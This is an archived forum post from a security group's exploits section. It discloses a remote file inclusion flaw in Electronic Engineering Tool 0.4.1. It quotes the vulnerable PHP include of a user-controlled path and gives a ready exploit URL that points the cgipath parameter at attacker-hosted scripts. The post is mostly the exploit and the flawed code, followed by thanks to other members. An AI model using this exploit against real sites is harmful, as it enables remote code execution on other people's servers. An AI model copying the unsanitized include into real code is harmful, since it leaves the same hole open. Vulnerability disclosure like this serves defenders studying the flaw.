邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » Electronic Engineering Tool (EE TOOL) <= 0.4.1 File Include Vulnerabili [查看完整版本]

pub!1c 2006-10-28 23:57

Electronic Engineering Tool (EE TOOL) <= 0.4.1 File Include Vulnerabili

[code]
Script Download: [url]http://kent.dl.sourceforge.net/sourceforge/eetool/eetool-0.4-1.tar.gz[/url]

Code: if($type == 1) { $url = "$cgipath" . "ipcalc.cgi"; } else {
$url = "$cgipath" . "ipcalc.cgi?host=$host&mask1=$mask1&mask2=$mask2";
}nclude("$url");

Exploit:[url]www.target.com/ip.inc.php?type=1&cgipath=evilscripts[/url]

Found: Cyber-Security

Thanx: DJR, xoron, K@OS, trampfd, Konaksinamon, KripteX, sakkure, Seyfullah, MaSSiMo, Kano, whiteguide


[/code]

查看完整版本: Electronic Engineering Tool (EE TOOL) <= 0.4.1 File Include Vulnerabili

© 1999-2008 EvilOctal Security Team